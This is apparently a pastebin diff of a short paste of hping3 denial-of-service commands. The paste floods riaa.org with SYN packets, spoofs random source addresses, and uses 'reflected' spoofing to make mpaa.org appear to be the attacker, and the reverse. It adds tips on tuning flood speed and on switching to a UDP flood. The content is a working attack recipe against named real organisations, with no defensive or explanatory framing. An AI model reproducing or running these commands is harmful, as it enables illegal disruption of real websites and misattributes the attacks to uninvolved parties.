View difference between Paste ID: zzewmMcn and
SHOW: | | - or go back to the newest paste.
1-
1+
- Run hping as root!
2
- To speed up the flood, lower the 'u100'
3
- If your connection cannot handle 'u100', try 'u200', and so forth...
4
- Using the --flood paramter is not recommended, as it will in most cases DoS your router/your own computer, and you will not be able to access the internet
5
- Replace the -S with -U for a UDP flood
6
7
### Normal hping DoS attack:
8
hping3 -S -i u100 riaa.org
9
10
### Spoofed random source address attack:
11
hping3 -S -i u100 riaa.org --rand-source
12
13
### Reflected attack(it looks like mpaa.org is DoS'ing riaa.org)
14
hping3 -S -i u100 riaa.org -a mpaa.org
15
16
### Reflected attack(it looks like riaa.org is DoS'ing mpaa.org)
17
hping3 -S -i u100 mpaa.org -a riaa.org